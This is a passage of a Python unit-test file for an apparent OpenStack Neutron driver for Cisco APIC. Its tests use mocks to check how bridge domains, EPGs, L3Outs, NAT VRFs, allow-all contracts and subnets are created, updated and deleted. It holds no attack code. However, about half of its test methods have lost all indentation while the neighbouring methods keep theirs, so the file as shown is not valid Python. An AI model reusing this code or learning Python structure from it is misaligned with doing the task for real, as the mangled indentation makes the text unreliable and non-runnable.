        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        if pre:
            self.driver._query_l3out_info = mock.Mock()
            self.driver._query_l3out_info.return_value = {
                'l3out_tenant': self._tenant(),
                'vrf_name': self._network_vrf_name(),
                'vrf_tenant': self._tenant(vrf=True)}
        nets = [
            {'tenant_id': mocked.APIC_TENANT + '1',
             'name': mocked.APIC_NETWORK,
             'id': 'net_id1'},
            {'tenant_id': mocked.APIC_TENANT + '2',
             'name': mocked.APIC_NETWORK,
             'id': 'net_id2'}]
        manager.NeutronManager = mock.MagicMock()
        manager.NeutronManager.get_plugin().get_networks.return_value = nets
        self.driver.delete_port_postcommit(port_ctx)
        if pre:
            l3out_name = self._scoped_name(net_ctx.current['name'],
                                           preexisting=True)
        else:
            l3out_name = self._scoped_name(mocked.APIC_NETWORK_NO_NAT)
        # The L3Out is detached from the VRF (context set to None).
        mgr.set_context_for_external_routed_network.assert_called_once_with(
            self._tenant(), l3out_name, None, transaction=mock.ANY)
        if pre:
            expected_calls = [
                mock.call(
                    l3out_name,
                    'contract-%s' % mocked.APIC_ROUTER,
                    external_epg=mocked.APIC_EXT_EPG, owner=self._tenant(),
                    provided=True, transaction=mock.ANY),
                mock.call(
                    l3out_name,
                    'contract-%s' % mocked.APIC_ROUTER,
                    external_epg=mocked.APIC_EXT_EPG, owner=self._tenant(),
                    provided=False, transaction=mock.ANY)]
            self._check_call_list(
                expected_calls,
                mgr.unset_contract_for_external_epg.call_args_list)
        else:
            mgr.delete_external_epg_contract.assert_called_once_with(
                self._scoped_name(mocked.APIC_ROUTER),
                l3out_name,
                transaction=mock.ANY)
        self.assertFalse(mgr.delete_external_routed_network.called)
        expected_l3out_bd_calls = [
            mock.call(self._tenant(neutron_tenant=n['tenant_id']),
                      self._scoped_name(n['id'], tenant=n['tenant_id']),
                      l3out_name,
                      transaction=mock.ANY)
            for n in nets]
        self._check_call_list(expected_l3out_bd_calls,
                              mgr.unset_l3out_for_bd.call_args_list)
    def test_delete_no_nat_gw_port_postcommit(self):
        """No-NAT gw-port delete on a driver-managed L3Out."""
        self._test_delete_no_nat_gw_port_postcommit(False)
    def test_delete_no_nat_pre_gw_port_postcommit(self):
        """No-NAT gw-port delete on a pre-existing L3Out."""
        self._test_delete_no_nat_gw_port_postcommit(True)
    def test_create_network_postcommit(self):
        """Creating a tenant network creates its BD and EPG with name aliases."""
        ctx = self._get_network_context(mocked.APIC_TENANT,
                                        mocked.APIC_NETWORK,
                                        TEST_SEGMENT1)
        mgr = self.driver.apic_manager
        self.driver.create_network_postcommit(ctx)
        mgr.ensure_bd_created_on_apic.assert_called_once_with(
            self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
            ctx_owner=self._tenant(vrf=True),
            ctx_name=self._network_vrf_name(net_name=ctx.current['id']),
            transaction='transaction', unicast_route=True)
        mgr.ensure_epg_created.assert_called_once_with(
            self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
            app_profile_name=self._app_profile(),
            bd_name=self._scoped_name(mocked.APIC_NETWORK))
        # BD and EPG get the Neutron display name as APIC nameAlias; the
        # containing object (app profile or tenant) gets the tenant name.
        expected_calls = [
            mock.call(mgr.apic.fvBD, self._tenant(),
                      self._scoped_name(mocked.APIC_NETWORK),
                      nameAlias=mocked.APIC_NETWORK + '-name'),
            mock.call(mgr.apic.fvAEPg, self._tenant(), self._app_profile(),
                      mocked.APIC_NETWORK,
                      nameAlias=mocked.APIC_NETWORK + '-name')]
        if self.driver.single_tenant_mode:
            expected_calls.append(mock.call(mgr.apic.fvAp, self._tenant(),
                                            self._app_profile(),
                                            nameAlias=mocked.APIC_TENANT))
        else:
            expected_calls.append(mock.call(mgr.apic.fvTenant, self._tenant(),
                                            nameAlias=mocked.APIC_TENANT))
        self._check_call_list(expected_calls,
                              mgr.update_name_alias.call_args_list)
    def test_create_route_leak_network_postcommit(self):
        """Creating a route-leak network additionally creates a "Leak-" L3Out
        in the VRF tenant (when VRF-per-router is enabled)."""
        ctx = self._get_network_context(mocked.APIC_TENANT,
                                        mocked.APIC_NETWORK,
                                        TEST_SEGMENT1,
                                        route_leak=True)
        mgr = self.driver.apic_manager
        self.driver.create_network_postcommit(ctx)
        mgr.ensure_bd_created_on_apic.assert_called_once_with(
            self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
            ctx_owner=self._tenant(vrf=True),
            ctx_name=self._network_vrf_name(net_name=ctx.current['id']),
            transaction='transaction', unicast_route=True)
        mgr.ensure_epg_created.assert_called_once_with(
            self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
            app_profile_name=self._app_profile(),
            bd_name=self._scoped_name(mocked.APIC_NETWORK))
        if self.driver.vrf_per_router_tenants:
            leak_l3out = "Leak-%s" % ctx.current['name']
            mgr.ensure_external_routed_network_created.assert_called_once_with(
                leak_l3out, owner=self._tenant(vrf=True),
                context=self._network_vrf_name(net_name=ctx.current['id']),
                transaction='transaction')
        expected_calls = [
            mock.call(mgr.apic.fvBD, self._tenant(),
                      self._scoped_name(mocked.APIC_NETWORK),
                      nameAlias=mocked.APIC_NETWORK + '-name'),
            mock.call(mgr.apic.fvAEPg, self._tenant(), self._app_profile(),
                      mocked.APIC_NETWORK,
                      nameAlias=mocked.APIC_NETWORK + '-name')]
        if self.driver.single_tenant_mode:
            expected_calls.append(mock.call(mgr.apic.fvAp, self._tenant(),
                                            self._app_profile(),
                                            nameAlias=mocked.APIC_TENANT))
        else:
            expected_calls.append(mock.call(mgr.apic.fvTenant, self._tenant(),
                                            nameAlias=mocked.APIC_TENANT))
        self._check_call_list(expected_calls,
                              mgr.update_name_alias.call_args_list)
def test_update_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
ctx.original = copy.copy(ctx.current)
mgr = self.driver.apic_manager
self.driver.update_network_postcommit(ctx)
self.assertFalse(mgr.apic.fvBD.update.called)
self.assertFalse(mgr.apic.fvAEPg.update.called)
# try again with a new network name
ctx.original['name'] = 'old_network_name'
self.driver.update_network_postcommit(ctx)
expected_calls = [
mock.call(mgr.apic.fvBD, self._tenant(),
self._scoped_name(mocked.APIC_NETWORK),
nameAlias=mocked.APIC_NETWORK + '-name'),
mock.call(mgr.apic.fvAEPg, self._tenant(),
self._app_profile(), mocked.APIC_NETWORK,
nameAlias=mocked.APIC_NETWORK + '-name')]
self._check_call_list(expected_calls,
mgr.update_name_alias.call_args_list)
    def test_create_external_network_postcommit(self):
        """Creating a driver-managed external network builds the full stack.

        Expects: NAT VRF, EXT-bd/EXT-epg shadow pair linked to the L3Out,
        the L3Out with node profile and static route, plus an allow-all
        contract provided and consumed by the external EPG.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK,
                                            TEST_SEGMENT1, external=True)
        mgr = self.driver.apic_manager
        self.driver.create_network_postcommit(net_ctx)
        ctx_name = self._network_vrf_name(
            nat_vrf=True, net_name=self._scoped_name(net_ctx.current['id']))
        mgr.ensure_context_enforced.assert_called_once_with(
            owner=self._tenant(vrf=True), ctx_id=ctx_name)
        bd_name = "EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK)
        mgr.ensure_epg_created.assert_called_once_with(
            self._tenant(),
            "EXT-epg-%s" % self._scoped_name(mocked.APIC_NETWORK),
            bd_name=bd_name, app_profile_name=self._app_profile(),
            transaction=mock.ANY)
        mgr.ensure_bd_created_on_apic.assert_called_once_with(
            self._tenant(), bd_name,
            ctx_name=ctx_name, ctx_owner=self._tenant(vrf=True),
            transaction=mock.ANY)
        mgr.set_l3out_for_bd.assert_called_once_with(
            self._tenant(), bd_name, self._scoped_name(mocked.APIC_NETWORK),
            transaction=mock.ANY)
        expected_calls = [
            mock.call(self._scoped_name(mocked.APIC_NETWORK),
                      owner=self._tenant(),
                      context=self._network_vrf_name(
                          nat_vrf=True,
                          net_name=self._scoped_name(net_ctx.current['id'])),
                      transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.ensure_external_routed_network_created.call_args_list)
        mgr.set_domain_for_external_routed_network.assert_called_once_with(
            self._scoped_name(mocked.APIC_NETWORK),
            owner=self._tenant(), transaction='transaction')
        mgr.ensure_logical_node_profile_created.assert_called_once_with(
            self._scoped_name(mocked.APIC_NETWORK), mocked.APIC_EXT_SWITCH,
            mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT,
            mocked.APIC_EXT_ENCAP, mocked.APIC_EXT_CIDR_EXPOSED,
            owner=self._tenant(), transaction='transaction')
        mgr.ensure_static_route_created.assert_called_once_with(
            self._scoped_name(mocked.APIC_NETWORK), mocked.APIC_EXT_SWITCH,
            mocked.APIC_EXT_GATEWAY_IP, transaction='transaction',
            owner=self._tenant())
        # Allow-all contract: one filter, one bidirectional subject.
        contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK
        mgr.create_tenant_filter.assert_called_once_with(
            contract_name, owner=self._tenant(), entry="allow-all",
            transaction=mock.ANY)
        mgr.manage_contract_subject_bi_filter.assert_called_once_with(
            contract_name, contract_name, contract_name,
            owner=self._tenant(),
            transaction=mock.ANY)
        expected_calls = [
            mock.call(self._scoped_name(mocked.APIC_NETWORK),
                      external_epg=mocked.APIC_EXT_EPG,
                      owner=self._tenant(),
                      transaction=mock.ANY)]
        self._check_call_list(
            expected_calls, mgr.ensure_external_epg_created.call_args_list)
        expected_calls = [
            mock.call(self._scoped_name(mocked.APIC_NETWORK), contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=True,
                      owner=self._tenant(), transaction=mock.ANY),
            mock.call(self._scoped_name(mocked.APIC_NETWORK), contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=False,
                      owner=self._tenant(), transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.set_contract_for_external_epg.call_args_list)
    def test_create_pre_external_network_postcommit(self):
        """Creating a pre-existing external network reuses the found L3Out.

        Only the EXT-bd/EXT-epg shadow pair and the allow-all contract are
        created (in the L3Out's own tenant); the L3Out, node profile and
        static routes are left untouched.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_PRE,
                                            TEST_SEGMENT1, external=True)
        mgr = self.driver.apic_manager
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant'}
        self.driver.create_network_postcommit(net_ctx)
        self.assertFalse(mgr.ensure_context_enforced.called)
        self.assertFalse(mgr.ensure_external_routed_network_created.called)
        self.assertFalse(mgr.set_domain_for_external_routed_network.called)
        self.assertFalse(mgr.ensure_logical_node_profile_created.called)
        self.assertFalse(mgr.ensure_static_route_created.called)
        self.assertFalse(mgr.ensure_external_epg_created.called)
        bd_name = "EXT-bd-%s" % self._scoped_name(net_ctx.current['name'],
                                                  preexisting=True)
        l3out = self._scoped_name(net_ctx.current['name'], preexisting=True)
        mgr.ensure_epg_created.assert_called_once_with(
            self._tenant(),
            "EXT-epg-%s" % self._scoped_name(net_ctx.current['name'],
                                             preexisting=True),
            bd_name=bd_name, app_profile_name=self._app_profile(),
            transaction=mock.ANY)
        mgr.ensure_bd_created_on_apic.assert_called_once_with(
            self._tenant(), bd_name,
            ctx_name='bar_ctx', ctx_owner='bar_tenant',
            transaction=mock.ANY)
        mgr.set_l3out_for_bd.assert_called_once_with(
            self._tenant(), bd_name, l3out,
            transaction=mock.ANY)
        contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK_PRE
        mgr.create_tenant_filter.assert_called_once_with(
            contract_name, owner='bar_tenant', entry="allow-all",
            transaction=mock.ANY)
        mgr.manage_contract_subject_bi_filter.assert_called_once_with(
            contract_name, contract_name, contract_name,
            owner='bar_tenant', transaction=mock.ANY)
        expected_calls = [
            mock.call(l3out, contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=True,
                      owner='bar_tenant', transaction=mock.ANY),
            mock.call(l3out, contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=False,
                      owner='bar_tenant', transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.set_contract_for_external_epg.call_args_list)
def test_create_pre_edge_nat_external_network_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant'}
self.driver.create_network_postcommit(net_ctx)
self.assertFalse(mgr.ensure_context_enforced.called)
self.assertFalse(mgr.ensure_external_routed_network_created.called)
self.assertFalse(mgr.set_domain_for_external_routed_network.called)
self.assertFalse(mgr.ensure_logical_node_profile_created.called)
self.assertFalse(mgr.ensure_static_route_created.called)
self.assertFalse(mgr.ensure_external_epg_created.called)
self.assertFalse(mgr.ensure_epg_created.called)
self.assertFalse(mgr.ensure_bd_created_on_apic.called)
self.assertFalse(mgr.set_l3out_for_bd.called)
self.assertFalse(mgr.set_contract_for_epg.called)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_create_unknown_pre_external_network_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = None
self.assertRaises(
md.PreExistingL3OutNotFound,
self.driver.create_network_postcommit, net_ctx)
self.assertFalse(mgr.ensure_context_enforced.called)
self.assertFalse(mgr.ensure_external_routed_network_created.called)
self.assertFalse(mgr.set_domain_for_external_routed_network.called)
self.assertFalse(mgr.ensure_logical_node_profile_created.called)
self.assertFalse(mgr.ensure_static_route_created.called)
self.assertFalse(mgr.ensure_external_epg_created.called)
self.assertFalse(mgr.ensure_epg_created.called)
self.assertFalse(mgr.ensure_bd_created_on_apic.called)
self.assertFalse(mgr.create_tenant_filter.called)
self.assertFalse(mgr.manage_contract_subject_bi_filter.called)
self.assertFalse(mgr.set_contract_for_external_epg.called)
self.assertFalse(mgr.set_l3out_for_bd.called)
def test_delete_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
mgr = self.driver.apic_manager
self.driver.delete_network_postcommit(ctx)
mgr.delete_bd_on_apic.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
transaction='transaction')
mgr.delete_epg_for_network.assert_called_once_with(
self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
app_profile_name=self._app_profile())
    def test_delete_route_leak_network_postcommit(self):
        """Deleting a route-leak network also removes its "Leak-" L3Out
        (when VRF-per-router is enabled)."""
        ctx = self._get_network_context(mocked.APIC_TENANT,
                                        mocked.APIC_NETWORK,
                                        TEST_SEGMENT1,
                                        route_leak=True)
        mgr = self.driver.apic_manager
        self.driver.delete_network_postcommit(ctx)
        mgr.delete_bd_on_apic.assert_called_once_with(
            self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
            transaction='transaction')
        mgr.delete_epg_for_network.assert_called_once_with(
            self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
            app_profile_name=self._app_profile())
        if self.driver.vrf_per_router_tenants:
            leak_l3out = "Leak-%s" % ctx.current['name']
            mgr.delete_external_routed_network.assert_called_once_with(
                leak_l3out, owner=self._tenant(vrf=True),
                transaction='transaction')
    def test_delete_external_network_postcommit(self):
        """Deleting a managed external network tears the whole stack down:
        shadow BD/EPG, L3Out, NAT VRF, allow-all filter and contract."""
        ctx = self._get_network_context(mocked.APIC_TENANT,
                                        mocked.APIC_NETWORK,
                                        TEST_SEGMENT1, external=True)
        mgr = self.driver.apic_manager
        self.driver.delete_network_postcommit(ctx)
        self.assertEqual(1, mgr.delete_bd_on_apic.call_count)
        self.assertEqual(1, mgr.delete_epg_for_network.call_count)
        mgr.delete_external_routed_network.assert_called_once_with(
            self._scoped_name(mocked.APIC_NETWORK), owner=self._tenant())
        ctx_name = self._network_vrf_name(
            nat_vrf=True, net_name=self._scoped_name(ctx.current['id']))
        mgr.ensure_context_deleted.assert_called_once_with(
            self._tenant(vrf=True), ctx_name, transaction=mock.ANY)
        contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK
        mgr.delete_tenant_filter.assert_called_once_with(
            contract_name, owner=self._tenant(), transaction=mock.ANY)
        mgr.delete_contract.assert_called_once_with(
            contract_name, owner=self._tenant(), transaction=mock.ANY)
    def test_delete_pre_external_network_postcommit(self):
        """Deleting a pre-existing external network keeps the L3Out.

        Only the shadow BD/EPG and the allow-all contract artifacts are
        removed, in the L3Out's own tenant.
        """
        ctx = self._get_network_context(mocked.APIC_TENANT,
                                        mocked.APIC_NETWORK_PRE,
                                        TEST_SEGMENT1, external=True)
        mgr = self.driver.apic_manager
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant'}
        self.driver.delete_network_postcommit(ctx)
        self.assertEqual(1, mgr.delete_bd_on_apic.call_count)
        self.assertEqual(1, mgr.delete_epg_for_network.call_count)
        self.assertFalse(mgr.delete_external_routed_network.called)
        contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK_PRE
        l3out = self._scoped_name(ctx.current['name'], preexisting=True)
        expected_calls = [
            mock.call(l3out, contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=True,
                      owner='bar_tenant', transaction=mock.ANY),
            mock.call(l3out, contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=False,
                      owner='bar_tenant', transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.unset_contract_for_external_epg.call_args_list)
        mgr.delete_tenant_filter.assert_called_once_with(
            contract_name, owner='bar_tenant', transaction=mock.ANY)
        mgr.delete_contract.assert_called_once_with(
            contract_name, owner='bar_tenant', transaction=mock.ANY)
    def test_delete_pre_edge_nat_external_network_postcommit(self):
        """Edge-NAT + pre-existing: neither BD/EPG nor L3Out are deleted.

        Only the allow-all contract is unset from the external EPG and the
        contract/filter are deleted in the L3Out's tenant.
        """
        ctx = self._get_network_context(mocked.APIC_TENANT,
                                        mocked.APIC_NETWORK_PRE_EDGE_NAT,
                                        TEST_SEGMENT1, external=True)
        mgr = self.driver.apic_manager
        self.driver._query_l3out_info = mock.Mock()
        self.driver._query_l3out_info.return_value = {
            'l3out_tenant': 'bar_tenant',
            'vrf_name': 'bar_ctx',
            'vrf_tenant': 'bar_tenant'}
        self.driver.delete_network_postcommit(ctx)
        # Edge-NAT networks have no driver-owned BD/EPG to clean up.
        self.assertFalse(mgr.delete_bd_on_apic.called)
        self.assertFalse(mgr.delete_epg_for_network.called)
        self.assertFalse(mgr.delete_external_routed_network.called)
        contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK_PRE_EDGE_NAT
        l3out = self._scoped_name(ctx.current['name'], preexisting=True)
        expected_calls = [
            mock.call(l3out, contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=True,
                      owner='bar_tenant', transaction=mock.ANY),
            mock.call(l3out, contract_name,
                      external_epg=mocked.APIC_EXT_EPG, provided=False,
                      owner='bar_tenant', transaction=mock.ANY)]
        self._check_call_list(
            expected_calls,
            mgr.unset_contract_for_external_epg.call_args_list)
        mgr.delete_tenant_filter.assert_called_once_with(
            contract_name, owner='bar_tenant', transaction=mock.ANY)
        mgr.delete_contract.assert_called_once_with(
            contract_name, owner='bar_tenant', transaction=mock.ANY)
def test_delete_external_no_nat_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver.delete_network_postcommit(ctx)
mgr.delete_external_routed_network.assert_called_once_with(
self._scoped_name(mocked.APIC_NETWORK_NO_NAT),
owner=self._tenant())
def test_create_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
mgr.ensure_subnet_created_on_apic.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK),
scope=None)
def test_create_subnet_nogw_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
subnet_ctx = self._get_subnet_context(None,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_create_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
mgr.ensure_subnet_created_on_apic.assert_called_once_with(
self._tenant(),
"EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK),
scope=None)
def test_create_edge_nat_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_delete_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.delete_subnet_postcommit(subnet_ctx)
mgr.ensure_subnet_deleted_on_apic.assert_called_once_with(
self._tenant(),
"EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK))
def test_delete_edge_nat_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.delete_subnet_postcommit(subnet_ctx)
self.assertFalse(mgr.ensure_subnet_deleted_on_apic.called)
    def test_update_external_subnet_postcommit(self):
        """Changing the gateway IP deletes the old subnet and creates the new.

        Both operations target the EXT-bd-* bridge domain and run in one
        transaction.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK,
                                            external=True)
        subnet_ctx1 = self._get_subnet_context(SUBNET_GATEWAY,
                                               SUBNET_CIDR,
                                               net_ctx)
        subnet_ctx2 = self._get_subnet_context('10.3.1.1',
                                               SUBNET_CIDR,
                                               net_ctx)
        # Simulate an update: ctx2 is the new state, ctx1 the original.
        subnet_ctx2.original = subnet_ctx1.current
        mgr = self.driver.apic_manager
        self.driver.update_subnet_postcommit(subnet_ctx2)
        mgr.ensure_subnet_deleted_on_apic.assert_called_once_with(
            self._tenant(),
            "EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
            '%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK),
            transaction=mock.ANY)
        mgr.ensure_subnet_created_on_apic.assert_called_once_with(
            self._tenant(),
            "EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
            '%s/%s' % ('10.3.1.1', SUBNET_NETMASK),
            transaction=mock.ANY)
def test_update_edge_nat_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
external=True)
subnet_ctx1 = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
subnet_ctx2 = self._get_subnet_context('10.3.1.1',
SUBNET_CIDR,
net_ctx)
subnet_ctx2.original = subnet_ctx1.current
mgr = self.driver.apic_manager
self.driver.update_subnet_postcommit(subnet_ctx2)
self.assertFalse(mgr.ensure_subnet_deleted_on_apic.called)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_create_external_subnet_overlap(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
external=True)
subnet_ctx = self._get_subnet_context(mocked.APIC_EXT_GATEWAY_IP,
mocked.APIC_EXT_CIDR_EXPOSED,
net_ctx)
raised = False
try:
self.driver.create_subnet_precommit(subnet_ctx)
except md.CidrOverlapsApicExternalSubnet:
raised = True
self.assertTrue(raised)
    def test_port_notify_on_subnet_update(self):
        """Ports on an updated subnet trigger a port_update notification."""
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK,
                                            seg_type='opflex')
        subnet_ctx1 = self._get_subnet_context(SUBNET_GATEWAY,
                                               SUBNET_CIDR,
                                               net_ctx)
        subnet_ctx2 = self._get_subnet_context('10.3.1.1',
                                               SUBNET_CIDR,
                                               net_ctx)
        subnet_ctx2.original = subnet_ctx1.current
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK,
                                          'vm1', net_ctx, HOST_ID1)
        # Make the port belong to the updated subnet so it gets notified.
        port_ctx.current['fixed_ips'] = [
            {'subnet_id': subnet_ctx2.current['id'],
             'ip_address': '10.3.1.42'}]
        subnet_ctx2._plugin.get_ports.return_value = [port_ctx.current]
        self.driver.update_subnet_postcommit(subnet_ctx2)
        self.assertTrue(self.driver.notifier.port_update.called)
def test_query_l3out_info(self):
ctx1 = [{
'l3extRsEctx': {'attributes': {'tDn': 'uni/tn-foo/ctx-foobar'}}}]
mgr = self.driver.apic_manager
mgr.apic.l3extOut.get_subtree.return_value = ctx1
info = self.driver._query_l3out_info('l3out', 'bar_tenant')
self.assertEqual('bar_tenant', info['l3out_tenant'])
self.assertEqual('foobar', info['vrf_name'])
self.assertEqual('foo', info['vrf_tenant'])
mgr.apic.l3extOut.get_subtree.reset_mock()
mgr.apic.l3extOut.get_subtree.return_value = []
info = self.driver._query_l3out_info('l3out', 'bar_tenant')
self.assertEqual(None, info)
expected_calls = [
mock.call('bar_tenant', 'l3out'),
mock.call('common', 'l3out')]
self._check_call_list(
expected_calls, mgr.apic.l3extOut.get_subtree.call_args_list)
    def test_nat_gw_port_precommit(self):
        """A gateway port on a NAT'ed external network passes precommit.

        No assertion is needed: the test passes if update_port_precommit
        does not raise.
        """
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK,
                                          'vm1', net_ctx, HOST_ID1, gw=True)
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        self.driver.update_port_precommit(port_ctx)
    def _test_no_nat_multiple_gw_port_precommit_exception(self, pre):
        """With NAT disabled, only one router tenant may use the ext network.

        When per_tenant_context is enabled, attaching router 'r2' while 'r1'
        (a different tenant) already exists raises
        OnlyOneRouterPermittedIfNatDisabled; after removing the conflicting
        router the update succeeds. *pre* exercises the pre-existing-L3Out
        variant.
        """
        if pre:
            self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
                'preexisting'] = 'True'
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK_NO_NAT,
                                            TEST_SEGMENT1, external=True)
        port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK_NO_NAT,
                                          'vm1', net_ctx, HOST_ID1, gw=True,
                                          router_owner='r2')
        # r1 belongs to a different tenant than r2/r3 -> conflict case.
        self.driver._l3_plugin.get_routers.return_value = [
            {'id': 'r1', 'tenant_id': 't1'},
            {'id': 'r2', 'tenant_id': mocked.APIC_TENANT},
            {'id': 'r3', 'tenant_id': mocked.APIC_TENANT}]
        mgr = self.driver.apic_manager
        mgr.get_router_contract.return_value = mocked.FakeDbContract(
            mocked.APIC_CONTRACT)
        if pre:
            self.driver._query_l3out_info = mock.Mock()
            self.driver._query_l3out_info.return_value = {
                'l3out_tenant': self._tenant(),
                'vrf_name': self._network_vrf_name(),
                'vrf_tenant': self._tenant(vrf=True)}
        if self.driver.per_tenant_context:
            self.assertRaises(md.OnlyOneRouterPermittedIfNatDisabled,
                              self.driver.update_port_precommit,
                              port_ctx)
        else:
            self.driver.update_port_precommit(port_ctx)
        # Remove the conflicting router; precommit must now succeed.
        del self.driver._l3_plugin.get_routers.return_value[0]
        self.driver.update_port_precommit(port_ctx)
    def test_no_nat_multiple_gw_port_precommit_exception(self):
        """No-NAT multi-router conflict, driver-created L3Out variant."""
        self._test_no_nat_multiple_gw_port_precommit_exception(False)
    def test_no_nat_multiple_pre_gw_port_precommit_exception(self):
        """No-NAT multi-router conflict, pre-existing L3Out variant."""
        self._test_no_nat_multiple_gw_port_precommit_exception(True)
    def test_no_nat_pre_gw_port_precommit_l3out_wrong_tenant(self):
        """A pre-existing no-NAT L3Out in a foreign tenant is rejected when
        per-tenant context or single-tenant mode is in effect.
        """
